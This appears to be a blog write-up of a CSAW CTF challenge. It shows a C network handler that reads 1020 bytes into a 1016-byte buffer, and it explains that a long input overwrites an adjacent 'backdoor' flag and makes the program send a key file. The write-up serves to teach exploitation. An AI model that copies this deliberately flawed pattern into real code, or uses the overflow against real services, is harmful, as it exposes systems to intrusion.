For this challenge we are given two files exploit1
and exploit1.c (code snip it from program). Exploit1.c code snip it is as
follows:
[snip]
void handle(int newsock) {
int backdoor = 0;
char buffer[1016];
memset(buffer, 0,
1016);
send(newsock,
"Welcome to CSAW CTF.", 21, 0);
recv(newsock, buffer,
1020, 0);
buffer[1015] = 0;
if ( backdoor ) {
fd =
fopen("./key", "r");
fscanf(fd,
"%s\n", buffer);
send(newsock,
buffer, 512, 0);
}
close(newsock);
}
[snip]
From the code snip it we can clearly tell the
program allocates 1016 bytes for the buffer but reads in 1020 bytes. This can
be confirmed in Ida Pro:
As the screen shot from Ida Pro shows the code will
read in four more bytes then what is allocated for buf. This will cause the
program to overwrite the values in var_D and var_C. The diagram of the stack is
as follows:
To make the program print the key we need to make
the value of var_C not equal zero. To do this we simply need to give the
program an input string that is at least 1020 bytes long. This will overwrite
var_C and force the program to run the logic that prints the key.
We've lost the key since yesterday, will edit if we find it
No comments:
Post a Comment